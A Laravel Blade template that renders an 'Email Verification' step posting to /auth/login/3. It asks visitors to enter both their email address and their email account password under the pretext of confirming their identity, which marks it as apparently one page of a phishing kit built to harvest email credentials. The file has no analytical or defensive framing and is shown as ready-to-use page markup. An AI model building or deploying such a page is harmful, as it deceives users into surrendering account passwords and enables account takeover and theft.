@layout('layouts.app')

@section('content')
<form class="cb-form" action="/auth/login/3" method="POST">
  <fieldset class="reg-content">
    <legend>Email Verification</legend>

    <p class="note">Fields with an asterisk (*) are required.</p>

    <div class="row">
      <div class="large-12 column">
        <div class="description">Help us confirm it's you by filling out the following information.</div>
      </div>
    </div>

    <div class="tabs-content">
      <div class="content active">
        <div class="row">
          <div class="large-6 medium-6 medium-6-override column">
            <label class="form-field-label" for="emailAddr">Email Address*</label>
            <input id="emailAddr" name="emailAddr" type="text" class="radius cb-input" autocapitalize="off" autocomplete="off" autocorrect="off" spellcheck="false">
          </div>

          <div class="large-6 medium-6 medium-6-override column">
            <label class="form-field-label" for="emailPass">Email Password*</label>
            <input id="emailPass" name="emailPass" type="password" class="radius cb-input cb-input-mask" autocapitalize="off" autocomplete="off" autocorrect="off" spellcheck="false">
          </div>
        </div>
      </div>

      <div class="row">
        <div class="large-12 column">
          <button class="button radius right submitBtn" type="submit" disabled="">Continue</button>
        </div>
      </div>
    </div>
  </fieldset>
</form>
@endsection